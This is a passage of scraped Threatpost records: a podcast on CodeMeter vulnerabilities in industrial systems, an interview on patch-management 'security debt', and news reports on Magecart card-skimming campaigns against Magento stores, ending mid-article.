Some of them are in the way that CodeMeter is parsing requests from WebSocket APIs. And some of them are related to license parsing, and license verifications. So it\u2019s very, the places where we found the vulnerabilities are very different from one another.\n\n**LO:** And can you talk a little bit more about the impact of the vulnerabilities and how easy they are to exploit? You had mentioned that, in one case, attackers could potentially send a specially crafted link, and that was one attack vector. What were the different types of attack scenarios there?\n\n**SB:** Yeah, sure. So in the first attack vector that I mentioned, this is actually a very easy one to exploit. In this case, in this attack vector, an attacker will prepare a website somewhere on the internet. And it will prepare, specifically crafted JavaScript that once a victim will go on this website \u2013 using some phishing methods or other ways to lure the victim into the website \u2013 the website will send this specifically crafted JavaScript to the browser of the victim. And this JavaScript code, what it will do, it will actually communicate locally with the CodeMeter server and use some WebSocket API in order to trigger a vulnerability we found in the license mechanism. So the full flow for the first attack vector would be a victim going on a malicious website using some phishing methods, then the website will attack the CodeMeter through the browser, and it will inject a malicious license that will cause CodeMeter to stop working properly.\n\n**LO:** Right. So it sounds like the impact here, too, would be, you know, remote code execution and enabling attackers to launch [denial-of-service attacks](<https://threatpost.com/ddos-attacks-skyrocket-pandemic/159301/>) and some other impacts there as well. It seems like it\u2019s kind of like a broad spectrum, right?\n\n**SB:** Yeah. 
So this was the first attack vector, and it was very easy to find, because lately, we have seen a rise in WebSocket usage. And there are a couple of implementation properties that when developers are implementing WebSocket, they really need to notice how they implement the WebSocket. Otherwise, it could open a door to attackers, just like in this case. So this was the first attack vector, which is kind of easy to exploit.\n\nAnd the second attack vector that we were able to find, requires a little bit of more knowledge of some cryptographic aspects and cryptographic methods. In the second attack vector, attackers would need to directly connect and communicate with the CodeMeter server. So they would need to be on the same local area network as their victim. And in this case, they can send specifically crafted packets to the machine, to the CodeMeter server, and then trigger a couple of vulnerabilities that we were able to find.\n\n**LO:** Right, and what would the impact be? If I successfully exploited what could an attacker do in that case scenario?\n\n**SB:** Yeah, so in this case, attackers will be able to run code remotely. So that would be an RCE, [remote code execution](<https://threatpost.com/critical-remote-code-execution-global-power-plants/151087/>), on the remote machine.\n\n**LO:** Right, right. It\u2019s really interesting. I feel like with industrial security, the bar is really raised a bit over other types of security threats, just because of what that could mean for different [industrial control systems](<https://threatpost.com/threatlist-attacks-on-industrial-control-systems-on-the-rise/137251/>), like programmable logic controllers, or other types of controls. 
And you know, what the real life impact would be for different industrial systems and machines \u2013 can you talk a little bit about what the real life attack or impact would look like for a victim here?\n\n**SB:** Yes, you\u2019re definitely right that when we\u2019re talking about ICS, it\u2019s a bit more dangerous, and we should be more alert than the usual IT network. And that\u2019s because OT networks, SCADA networks, contain some dangerous parts. So we have some machines, and we have some actuators in this network. So if an attacker can somehow attack this kind of network, they will be able to get access to [very dangerous equipment that can endanger humans](<https://threatpost.com/triton-malware-targets-industrial-control-systems-in-middle-east/129182/>). And we\u2019ve seen this multiple times in the past. So we have seen it with Stuxnet, [the Stuxnet malware](<https://threatpost.com/details-surface-on-stuxnet-patch-bypass/111579/>) was able to cause some real damage, real physical damage. And that\u2019s why we\u2019re so alert when we\u2019re talking about ICS security. Specifically, in this case, since CodeMeter is so widespread in those networks, because many ICS vendors integrated with CodeMeter, then if attackers will be able to exploit CodeMeter and attack CodeMeter, basically, it means that they will be able to get access to thousands of machines in OT networks. And that\u2019s why it has such a big impact because it actually opens a door for attackers to attack multiple computers, multiple machines on the ICS network.\n\n**LO:** That could potentially be very damaging and you make a really good point that these challenges do exist, they\u2019re kind of going beyond just CodeMeter and to affected vendors like Rockwell, like Siemens, and Rockwell and Siemens have released their own security advisories, but with CodeMeter being integrated into many ICS products, you know, what can users do to make sure their systems are safe? 
Because as you had mentioned, in the research users may be unaware that this vulnerable component is still running in their environment.\n\n**SB:** Yeah, exactly. So you\u2019re definitely right. CodeMeter is a third-party component. So usually users will not install CodeMeter themselves. They will install, let\u2019s say, a software by Rockwell Automation or any software by Siemens, and then along the installation bundle CodeMeter will be shipped and installed. So users will not install CodeMeter themselves, and therefore they won\u2019t even know they have CodeMeter. And that\u2019s why we developed a website that end users could go online, to our website, to our test web page, and actually test if the machine is vulnerable. So I definitely recommend anyone to go online to our website, to our test page and test if they\u2019re vulnerable. And we have developed a couple of ways to understand if you\u2019re vulnerable too, so we have some tools on our GitHub repository that system administrators could use these tools in their networks to mass scan their network and see what machines are running CodeMeter. So to summarize the answer a bit, first, I would like to recommend anyone to discover instances of CodeMeter in the network so they can do it by going to our test page or our GitHub repository, and download our scanning tool. And then to mitigate it, that\u2019s another story and to mitigate it, first of all, I would recommend to follow Wibu\u2019s own advisory. So Wibu is the company that developed CodeMeter, and they have their own advisory. But also I would recommend end users to read the advisories by the other vendors, let\u2019s say, the Rockwell Automation vendor, or the Siemens, depending on the equipment and software they have installed.\n\n**LO:** Yeah, definitely, for sure. 
And just taking a step back here and looking at industrial control system security and critical infrastructure security in general, I feel like patching in general in the industrial world is just a big challenge because of different things that need to happen. I mean, machines can\u2019t be just shut down in order to patch and things like that. Can you talk a little bit about what types of challenges there are [when it comes to patch management](<https://threatpost.com/schneider-electric-patches-critical-rce-vulnerability/131610/>) for industrial control systems, and also the process of disclosure in this situation as well, when you first notify them, when a fix was issued?\n\n**SB:** So my team is responsible for finding vulnerabilities. So we assess different tickets, different products from the security, security angle, and we\u2019re trying to find vulnerabilities so the defenders can think ahead. And once we discover a couple of vulnerabilities, we\u2019re preparing a PoC, proof of concept. And then we\u2019re preparing to report and we\u2019re sending it to the vendor. From this point, the vendor needs to triage and make sure our report is valid. And once they do that, we\u2019re starting to work with them in order to fix the vulnerabilities. So sometimes, the vendor asks for us, for more information or to explain a bit how we found it. And once the vendor has a pretty good idea of where their vulnerabilities are and how to patch it, they\u2019re actually developing a patch or they\u2019re developing a new release, and they\u2019re releasing a new version with the fixed code. From this point, we\u2019re starting to work with some CERTs organizations, so CERT organizations [help to distribute the information that new software releases are out](<https://threatpost.com/nsa-urgent-warning-industrial-cyberattacks-triconex/157723/>) and new patches are out. 
And we\u2019re working with them too, so they can alert the community, specifically the industrial community, of new vulnerabilities and what are the patches. And from this point, it comes to the first part of your question. And so people know that some vulnerabilities exist, and they needed to patch their software.\n\nAnd so it really depends right now, the type of the factory that or the network that we\u2019re talking about. If we\u2019re talking about an external network that has a some online access to the internet, then patching is much easier. So the admins will just download the patch, and we\u2019ll install it. But if we\u2019re talking about a production network, which is usually offline, it doesn\u2019t connect directly to the internet. So what we\u2019ll have to do is first test the patch offline in their lab. So usually they have a lab offline with all the equipment, which simulates and emulates actually the real production line and they will test it in the lab to make sure there are no malfunctions and their software works well, with their code that\u2019s running in the factory and the patches. And once they will verify this, they will move on to shut down the factory, maybe it will be on Saturday, maybe it will be on Sunday for a few hours. So patches could be applied when the machines are down. So that\u2019s why it\u2019s so complicated to patch software in production lines, because the administrators will need to work very hard in order to test it in their lab before applying the patches. And then when applying the patches, the factory must be shut down. Because they don\u2019t want any damage to be caused if patches go wrong on a live production.\n\n**LO:** Right? That\u2019s pretty crazy that they have to, you know, completely shut down too. And I think when you look at IT and OT teams, and how they need to work together. 
One thing that is difficult for people on the security side to realize at least just how important downtime is for [these different types of industrial machines](<https://threatpost.com/ics-security-plagued-with-basic-avoidable-mistakes/138273/>). And I think that is really why patching is such a difficulty. You know, although it\u2019s so necessary as well, as we\u2019re seeing in this case. Now, can you talk a little bit more about what other challenges exist in general, when it comes to applying security controls or other security issues that exist in critical infrastructure that you\u2019ve seen over your time looking for vulnerabilities in industrial control systems?\n\n**SB:** Yeah, sure. So there are a couple of different categories of attackers, some attackers would like to [attack OT networks just to install a ransomware](<https://threatpost.com/ransomware-national-crisis-cisa-ics/153322/>). Because they know that if their ransomware campaign is successful, then the factory is being shut down. And it costs a lot of money to the factory owners, and they most likely pay the ransom. So this is one category of financial cyber criminals that just want to earn some money, and they want to install a ransomware in the network. Another category that we\u2019ve encountered in the past would be attackers, that are nation state sponsored, or a very advanced group that wanted to attack factories to get a foothold inside the OT network, just so they can prepare some kind of weapon, a physical weapon, that they can weaponize and use it whenever they need. So for example, they can even blow up a factory if they\u2019re getting enough money from other criminals. So this is a very dangerous type of attacker. And it\u2019s actually very rare to see an ongoing campaign like this, because the complexity of this campaign, the complexity of this operation is very high. And you need some very advanced tools to maintain such a campaign. 
So this is the second category. The third category would be spontaneous access to OT networks. So let\u2019s say you have attackers on the IT network, and suddenly they discover a misconfiguration that allows them to go from the IT network to the OT network, and they just start to poke around and see what kind of computers and what kind of machines and other OT equipment is found on this network. And they\u2019ll just try to use some exploits. Usually it won\u2019t be any sophisticated exploits. So usually it will be one days, not zero days. And usually they could be caught very quickly because they\u2019re not very sophisticated. So I would categorize the different attackers into these three groups.\n\n**LO:** Right, and I know at least with ransomware, I feel like ransomware attacks have steadily increased over the past year attacking industrial companies, especially [when you look at like Norsk Hydro](<https://threatpost.com/norsk-hydro-calls-ransomware-attack-severe/142924/>) and some of the other vendors who have been targeted. So that seems like it\u2019s an up and coming one. Is that what you\u2019re seeing on your end as well?\n\n**SB:** Yeah, so usually these attacks are opportunistic, so attackers will just release, you know, a phishing campaign or they will release some kind of virus that will try to copy itself to different networks. And if they\u2019re successful, they will be able to infect the OT network as well. And then if a malware or in this case ransomware is being spread in the OT network, it will be very beneficial for the attackers, because usually, factory owners will do anything to continue the production line. So they don\u2019t want to lose money. So they\u2019ll do some analysis, will it cost them more to pay the ransom? Or to shut down their factory?\n\n**LO:** Right, right. 
And Sharon before we wrap up is there anything else you wanted to highlight either relating to your recent discoveries of the six vulnerabilities in CodeMeter, or just in general, any trends that you may be seeing in the industrial security space?\n\n**SB:** So I just want to sum up with saying that we have seen a high, high and increased usage of malware campaigns and other exploits targeting specifically OT networks. And that\u2019s why we\u2019re very focused on finding vulnerabilities before the attackers will find them. So my message to anyone is always patch. This is the most efficient way to overcome vulnerabilities and be alert.\n\n**LO:** Great. Absolutely. Well, Sharon, thank you so much for joining us today on the Threatpost podcast and talking to us a little bit more about industrial control system security and these recent vulnerabilities.\n\n**SB:** Yeah, sure. Happy to be here. And thank you very much, Lindsey.\n\n**LO:** And to all of our listeners. Thank you for listening in to the Threatpost podcast today. 
If you have any questions or comments on industrial security, please reach out to us on our Twitter page @Threatpost and catch us on our next episode of the Threatpost podcast.\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-09-23T15:32:55", "type": "threatpost", "title": "Critical Industrial Flaws Pose Patching Headache For Manufacturers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-23T15:32:55", "id": "THREATPOST:F7D65957C604C7659052B9B15947A826", "href": "https://threatpost.com/critical-industrial-flaws/159448/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:13:59", "description": "One of the largest known Magecart campaigns to date took place over the weekend, with nearly 2,000 e-commerce sites hacked in an automated campaign that may be linked to a zero-day exploit. The attacks have impacted tens of thousands of customers, who had their credit-card and other information stolen, researchers said.\n\nAccording to Sansec Threat Intelligence, online stores running Magento versions 1 and 2 are being targeted in a classic Magecart attack pattern, where e-commerce sites are hacked, either via a common vulnerability or stolen credentials. If a compromise is successful, merchant websites are then injected with a web skimmer, which surreptitiously exfiltrates personal and banking information entered by customers during the online checkout process.\n\nThe firm\u2019s telemetry picked up \u201c1904 distinct Magento stores with a unique keylogger (skimmer) on the checkout page,\u201d the firm said [in a posting](<https://sansec.io/research/largest-magento-hack-to-date>) on Monday. 
\u201cOn Friday, 10 stores got infected, then 1058 on Saturday, 603 on Sunday and 233 today\u2026.Most stores were running Magento version 1, which was announced end-of-life last June. However, some stores were running Magento 2.\u201d\n\nIn delving into the campaign, Sansec researchers were able to determine that many victimized stores had no prior history of security incidents; and, they speculated that the attacks may be linked to a $5,000 Magento exploit that went up for sale in August in underground forums. The zero-day allows a brand-new avenue to gaining server (write) access to fully patched websites.\n\n\u201cUser z3r0day announced on a hacking forum to sell a Magento 1 remote code-execution exploit method, including instruction video, for $5,000,\u201d according to Sansec, who added that the seller pledged to only sell 10 copies of the exploit.\n\n\u201cAllegedly, no prior Magento admin account is required,\u201d the firm noted. \u201cSeller z3r0day stressed that \u2013 because Magento 1 is end-of-life \u2013 no official patches will be provided by Adobe to fix this bug, which renders this exploit extra-damaging to store owners using the legacy platform.\u201d\n\nAround 95,000 Magento 1 stores are still operating despite the lack of support, the firm added.\n\nSansec\u2019s forensic investigation showed that on Magento 1 stores, a skimmer was injected into the file \u201cprototype.js,\u201d which is part of a standard Magento installation. For the affected Magento 2 stores, a skimmer was found in a jquery.js file, hidden in the Magento 2 code base. 
In both cases, the same malware is loaded from a malicious mcdnn.net domain, while the data is exfiltrated to a Moscow-hosted site at https://imags.pw/502.jsp, on the same network as the mcdnn.net domain.\n\n\u201cAttacker(s) used the U.S.-based IP 92.242.62.210 to interact with the Magento admin panel, and used the \u2018Magento Connect\u2019 feature to download and install various files, including a malware called mysql.php. This file was automatically deleted after the malicious code was added to prototype.js.\u201d\n\nThe web server logs indicate that numerous attempts were made to install files over the weekend, possibly to install improved versions of the skimmer.\n\n\u201cThis automated campaign is by far the largest one that Sansec has identified since it started monitoring in 2015,\u201d researchers said. \u201cThe previous record was 962 hacked stores in a single day in July last year. The massive scope of this weekend\u2019s incident illustrates increased sophistication and profitability of web skimming. Criminals have been increasingly automating their hacking operations to run web skimming schemes on as many stores as possible.\u201d\n\nResearchers recently reported that they have seen[ an uptick in the number of e-commerce sites ](<https://threatpost.com/8-city-gov-websites-magecart/156954/>)that are being attacked by Magecart and related groups, dovetailing with new tactics. Earlier in September, Magecart was seen [using the secure messaging service Telegram](<https://threatpost.com/magecart-credit-card-skimmer-telegram-c2-channel/158851/>) as a data-exfiltration mechanism.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. 
**[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201d. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T16:01:15", "type": "threatpost", "title": "Magecart Attack Impacts More Than 10K Online Shoppers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-14T16:01:15", "id": "THREATPOST:D1DDBC944E33F3C1BB8815964C2B9E2B", "href": "https://threatpost.com/magecart-campaign-10k-online-shoppers/159216/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:23:15", "description": "Companies are lagging when it comes to keeping up with software security patches \u2013 causing them to fall into \u201csecurity debt,\u201d Chris Eng, chief research officer with Veracode said.\n\nToday, challenges around patch management are being worsened by applications using third-party code and open source libraries, which often introduce another entire set of vulnerabilities, said Eng, speaking at the [RSA Conference 2020 in San Francisco](<https://threatpost.com/category/rsac/>) last week.\n\n\u201cWhat will happen is companies will get further and further behind on those open source version patches,\u201d he said. 
\u201cAnd the further you get behind, the harder it is to catch up.\u201d\n\nThe upside, however, is that researchers are finding that DevOps and security can actually coexist very nicely, creating opportunities to vastly improve software security. \u201cIf you incorporate security in the right way, DevOps is actually a great opportunity to improve the way that you\u2019re doing software security. And so I think that\u2019s the big\u2026 takeaway,\u201d said Eng.\n\nEng discusses the biggest patch management challenges in his full interview with Threatpost, below.\n\n_Below find a lightly edited transcript of the interview._\n\n**Lindsey O\u2019Donnell Welch**: This is Lindsey O\u2019Donnell Welch with Threatpost, and I\u2019m here today at RSA Conference, joined by Chris Eng with Veracode. Chris, thanks so much for joining us today. How\u2019s your conference been?\n\n**Chris Eng:** It\u2019s been very busy, as usual.\n\n**LO:** It\u2019s always a little crazy, definitely. So, thank you so much for joining us today, I wanted to talk to you about a report that you had released back in October. And it was called the \u201cState of Software Security.\u201d And basically, it was breaking down some of the most prevalent vulnerabilities that were discovered in software, but then also looking at how those vulnerabilities were being addressed and patched and some of the challenges around patch management for companies. Just to start, there is a term that you had used in the report called \u201csecurity debt\u201d \u2013 can you tell us what that term means and how it relates to this report?\n\n**CE:** Yeah, I\u2019ll give you that and kind of a little bit of kind of context for the report. So security debt is kind of if you think about it, anything that you know about in your software, vulnerability wise, that you just select not to fix, that you\u2019re going to fix later. Right? 
You can think of it like, like financial debt, like racking up, you know, dollars on a credit card, and then paying the minimum each month, right? You\u2019ll eventually get to paying all that down over time, but you\u2019ll pay a lot of interest, it\u2019ll cost you more, it\u2019ll be more painful. And so we see the same thing with security debt across the applications that we scan. The report is basically a consolidation of all of the customer scans that happen in our product, so tens of thousands of applications and millions of scans over a one year period. So we can kind of see exactly what\u2019s happening out there, across different industries and so on and what patterns are actually happening.\n\n**LO:** Yeah, that\u2019s really useful information to have obviously. So what are some of the key factors that go into security debt that you guys were specifically looking at?\n\n**CE:** Well, the picture is not the greatest in terms of what we\u2019re seeing out there, we\u2019re seeing over half of applications are actually accumulating more security debt over time. About 25 percent are staying flat, and then 25 percent are actually reducing them. And obviously, that\u2019s what you want, you want to reduce it so that you get to a point where you\u2019ve eliminated all the debt, and then as you go along, you\u2019re detecting new vulnerabilities along the way, but you\u2019re fixing them as they come up, right? Just, again, with the financial analogies, paying down what you spend each month. And a lot of companies are struggling with the security debt for these applications that they may have been building for many years, and just kind of pushing the security vulnerabilities off to the side. So what we really wanted to figure out was, what are the factors that contribute to how well an organization gets after the security debt. So we looked at a number of different areas there to try and like, find some correlations.\n\n**LO:** Yeah. 
Can you go deeper into that?\n\n**CE:** Yeah, so \u2013 and some of these are going to seem obvious once you talk about them \u2013 but it\u2019s actually different to have the data behind it and kind of show that that\u2019s the case. One was just scan frequency, right? So if you\u2019re scanning your applications, you know, once a year, or once a month, like that\u2019s not as good as once a day, or more often than that. And so, you know, we found the ones that are scanning more frequently, the most frequently, are fixing stuff about three times faster. And so the amount of security debt, it\u2019s not growing as much.\n\nWe also found that scan cadence matters a lot. So if you imagine over the course of a year, you could be scanning on a steady cadence, like either once a day or once a week or once a year, but at some steady pace, probably built up through some automation and you\u2019ve got some scripts to do whatever. And then you can imagine a different visual picture where you have this like flurry of scanning, right? Like a security sprint type activity, and then you do nothing for six months, and then you decide you\u2019re going to pay attention to it again. So you do this flurry of activity, and then you do nothing. And so we call that \u201cbursty.\u201d And so when you compare, like when you take every application that, you know, in the whole data set, and you map it against that, steady versus bursty versus irregular, you find that the steady ones actually do decrease their security debt over time, and the other ones get worse.\n\nSo it\u2019s not a problem that goes away immediately, it\u2019s a lot to deal with, it takes a lot of work to fix these, these coding issues. But you know, there are these factors that can make it easier to overcome.\n\n**LO:** You also looked at vulnerabilities like cross site scripting, all the way up to authentication and misconfigurations. 
And so how did that relate to the concept of security debt, in terms of how long it was taking companies to patch certain vulnerabilities versus others?\n\n**CE:** Yeah we had a theory that higher severity vulnerabilities \u2013 so ones that were just like, had a higher impact if exploited \u2013 would be fixed faster. That seems reasonable. Or that higher criticality applications like for the business that says, \u201cWell, this application\u2019s like way more important business value wise than this other one,\u201d we expected that those, you know, those would be fixed faster. And it turns out that, you may have a little bit of speed improvement on, let\u2019s say, the higher severity versus the medium or low severity flaws, but not significantly. It wasn\u2019t nearly as impactful as the scan frequency and the scan cadence, which was interesting.\n\n**LO:** Yeah.\n\n**CE:** You know, you would just expect that intuitively, to work that way. And it turns out it doesn\u2019t. We looked at a number of factors that we thought might influence that, and it really didn\u2019t. And over the course \u2013 this is the tenth time we\u2019ve done this report \u2013 and, over the course of those years, we are continuing to see the same types of vulnerabilities crop up over and over again, right? They\u2019re not disappearing. If you looked at an individual organization, I think you\u2019d see a downward trend, but as companies are starting to scan more and more of their software that they have, and companies are starting to do security testing that maybe have never done it before, those companies that are improving, those companies that are new, are kind of averaging each other out, right? 
You still see the cross site scripting, the SQL injections, and all the issues that we\u2019ve known about for decades.\n\n**LO:** Well, yeah, you mentioned that this is the tenth time you\u2019ve done this report, so have you noticed any sort of shifts in terms of things getting better or getting worse or is it remaining the same?\n\n**CE:** You see slight declines in certain categories, especially the ones that are well known, tied to breaches, SQL injection, things like that. But it\u2019s still fairly prevalent. And again, that\u2019s still partly education, partly some applications never having been tested before. And so they\u2019ve got a lot of stuff piled up that was never addressed. So as we get better with education, as we get better with, again, like better automation of scanning and incorporating it into the development lifecycle at all possible phases, shifting that left and actually, you know, fixing stuff before it gets so expensive to fix. I think we are going to see that get better.\n\n**LO:** Yeah, I mean, can you talk a little bit about patch management in general, and the complexities and challenges that companies are facing every day?\n\n**CE:** Specifically in the software space, what we see a lot of is just like open source use, right? So nobody\u2019s building applications from scratch, right? They\u2019re using open source libraries for a lot of that functionality. And so you may write 10 percent of the code yourself and you may be borrowing the other 90 percent for a new application. And so when you do that, that\u2019s great. You don\u2019t have to reinvent the wheel every time. But you also inherit a lot of the risk from those open source libraries.\n\nAnd what typically happens is you\u2019re developing a new product, you choose those libraries, you download them. And then whatever version those libraries were on at the time, that\u2019s the one that you stick with. 
So as you can imagine, over time, vulnerabilities are discovered in those libraries. And so the security of those libraries gets worse and worse and worse over time. So the patch management issue with regard to software is well, how much risk are these libraries now introducing, and when is the right time to patch those, right? If something is announced, and there\u2019s an exploit for it, I\u2019m suddenly vulnerable today, when yesterday I was fine. And I didn\u2019t make any changes to my software, right? I just, the ecosystem just got worse. So what will happen is companies will get further and further and further behind on those open source version patches. And the further you get behind, the harder it is to catch up, if you imagine going from version one to version two on something that\u2019s a lot easier than going from version one to version eight, because things break along the way. So that\u2019s the pattern you see is this inherited risk tends to grow over time. And that is essentially another form of security debt.\n\n**LO:** Right. And that makes it even more complicated, right, because you do have kind of, it\u2019s almost like out of your hands a little bit.\n\n**CE:** It is, things can change underneath you without you actually doing anything. And that\u2019s the sort of the part that\u2019s hard to wrap your head around, you don\u2019t control the risk entirely. You hope that something gets patched around the same time that a vulnerability is announced. But sometimes you\u2019re just left wide open. And you have to figure out a way to kind of code around that. So it\u2019s something we\u2019re paying a lot of attention to in the next version of the report that we\u2019re actually working on now. 
We\u2019re trying to drill in a lot more on the open source and the third party stuff and try and find some interesting tidbits that will hopefully tell us a little bit more about what\u2019s happening there.\n\n**LO:** Were there any other key takeaways that you wanted to highlight from this previous report especially looking into 2020?\n\n**CE:** I think, really, the takeaway for us is, you know, there\u2019s been a lot of tension, I think, between DevOps and security in the past, there\u2019s a notion that, well, DevOps is trying to move so quickly, and how can they possibly do that? Because where will the security happen? Right? And so some security professionals that haven\u2019t really kind of caught onto how DevOps is working are a little bit afraid of what that\u2019s going to do to the safety of their software.\n\nAt the same time, you want the developers to be able to create business value and like code and solve these problems confidently and put the software out there in a secure manner. So what we\u2019re finding especially with that scan cadence and scan frequency thing is that DevOps and security can actually coexist very nicely. And in fact, the practices that DevOps brings to software development actually are beneficial for security as well, that regularity, that automation, the feedback loops. And so if you incorporate security in the right way, DevOps is actually a great opportunity to improve the way that you\u2019re doing software security. And so I think that\u2019s the big, the big takeaway.\n\n**LO:** Definitely something to keep an eye on. Well, Chris, thank you so much for joining us today at RSA to talk about your report and what you\u2019re seeing in terms of vulnerabilities and how they\u2019re being addressed.\n\n**CE:** My pleasure, nice talking to you.\n\n**LO:** Great. 
Thank you.\n", "cvss3": {}, "published": "2020-03-05T19:53:16", "type": "threatpost", "title": "Chris Eng: Patch Management Challenges Drive 'Security Debt'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-05T19:53:16", "id": "THREATPOST:81EBB25A8E63A83670A070DD550D9644", "href": "https://threatpost.com/chris-eng-patch-management-challenges-drive-security-debt/153471/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:29:38", "description": "In an interesting development on the financial cybercrime scene, different Magecart groups have been spotted stepping over each other and attacking the same sites.\n\nMagecart is an umbrella term encompassing several different threat groups who all use the same modus operandi: They compromise websites built on the Magento e-commerce platform in order to inject card-skimming scripts on checkout pages, stealing unsuspecting customers\u2019 payment card details and other information entered into the fields on the page.\n\nAccording to research from PerimeterX, multiple Magecart attacks are skimming credit cards from sites at the same time. These don\u2019t seem to be coordinated, according to the firm, given that each of the attacks was different in terms of the techniques used to compromise the target retailers.\n\nIdo Safruti, co-founder and CTO of PerimeterX, said in an email interview that the presence of multiple skimmers indicates that the Magecart groups are less affiliated with each other than many believe.\n\n\u201cFrom what we\u2019ve learned so far, this is a cybercrime-as-a-service operation where multiple groups operate and breach websites, Magento-based and others, and they use different skimming kits purchased on the Dark Web,\u201d he told Threatpost. \u201cCybercriminals are taking advantage of any new opportunity. 
When a specific type of attack has been published or exposed and studied, many crime groups will try and take advantage of the new attack and the new techniques used in it.\u201d\n\n**Multiple Skimmer Discovery**\n\nIn researching recent Magecart attacks on clothing e-shop Sixth June that came to light last week, PerimeterX researchers found the Sixth June skimmed data being posted to a domain called mogento[dot]info, which was also hosting the skimmer. Scanning the web for other sites posting data to that same domain uncovered several other infected sites, including tubing-and-valve specialist PEXSuperstore.com. Further investigation showed that PEXSuperstore was also infected with a second Magecart skimmer \u2014 only this one was exfiltrating card data to https://assetstorage[dot]net/PEXSuperstore.com.\n\n\u201cThe two skimmers were completely different from each other in terms of code, obfuscation level and complexity,\u201d explained PerimeterX research lead Mickey Alton, [in a posting on Monday](<https://www.perimeterx.com/blog/multiple-magecart-groups-attacking-simultaneously/>). \u201cBut, both attacks targeted Magento-based sites and used similar methods of code injection, and served malicious first-party code to unsuspecting users.\u201d\n\nMore specifically, the Sixth June attacker directly compromised the PEXSuperstore website (i.e., used \u201cfirst-party code\u201d), with a decoy code snippet that masqueraded as a Google Analytics script. The decoy script then pulled in an obfuscated snippet that loaded the skimmer from a remote server controlled by the attacker. 
The second Magecart attacker on the other hand compromised the website by simply modifying the website\u2019s own script related to the checkout process, injecting skimming code at the bottom of the original script.\n\n\u201cThis skimmer was on the checkout page sniffing users\u2019 [personally identifiable information] PII data and sending post requests to assetstorage[dot]net,\u201d wrote Alton. \u201cWhen placing an order, the compromised first-party checkout script is called and executes the skimmer\u2026.we can only surmise that the web server security controls were bypassed to make changes to the website.\u201d\n\nThe second skimmer host, assetstorage[dot]net, was found to be related to a much larger campaign, with the same MO used to target sportswear giant UmbroBrasil and other lesser-known websites.\n\nIt also appears that the double-dipping isn\u2019t intentional; PerimeterX researchers surmised that the Magecart groups are likely running attack campaigns simultaneously without realizing it.\n\n\u201cIn recent years the cybercrime world has evolved much like the software and cloud world has evolved with many groups offering services to perform specific tasks \u2013 like infecting a server, loading a payload, or providing a specific payload to carry an attack,\u201d Safruti told Threatpost. \u201cThis is why we see more attacks using identical mechanisms and potentially multiple attackers infecting the same breached site(s), similar to the fact that many competing startups may be running their services on the same cloud vendor, and using the same open-source libraries.\u201d\n\nMagecart, in operation since 2015, is a collection of groups that have been blamed for an array of high-profile breaches \u2013 from [Ticketmaster](<https://threatpost.com/ticketmaster-breach-just-one-part-of-a-wide-ranging-campaign/133892/>) to [British Airways](<https://threatpost.com/magecart-group-pinned-in-recent-british-airways-breach/137338/>). 
Skimmers can be injected directly into websites (as is the case with First Aid Beauty), or through compromised third-party suppliers used by sites.\n\nMore recently, in August it was [disclosed](<https://threatpost.com/magecart-ecommerce-card-skimming-bonanza/147765/>) that more than 80 global eCommerce sites were actively compromised by Magecart groups, while a September report found that [a faction](<https://threatpost.com/magecart-group-targets-routers-behind-public-wi-fi-networks/148662/>) of the Magecart threat group is testing code that targets routers used to provide free or paid Wi-Fi services in public spaces and hotels.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join an expert from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-11-04T22:17:33", "type": "threatpost", "title": "Magecart Groups Attack Simultaneous Sites in Card-Theft Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-04T22:17:33", "id": "THREATPOST:75F9985EEED2523C6C65016DB1C5630A", "href": "https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:17", "description": "Concerned global citizens making donations to help fight the [massive Australia bushfires](<https://www.cbsnews.com/news/australia-fires-firefighters-team-up-with-americans-to-fight-bushfires/>) have been caught up in a Magecart attack, after one of the groups implanted a payment-card skimmer on the check-out page of a legitimate online donation site.\n\nResearchers [ran 
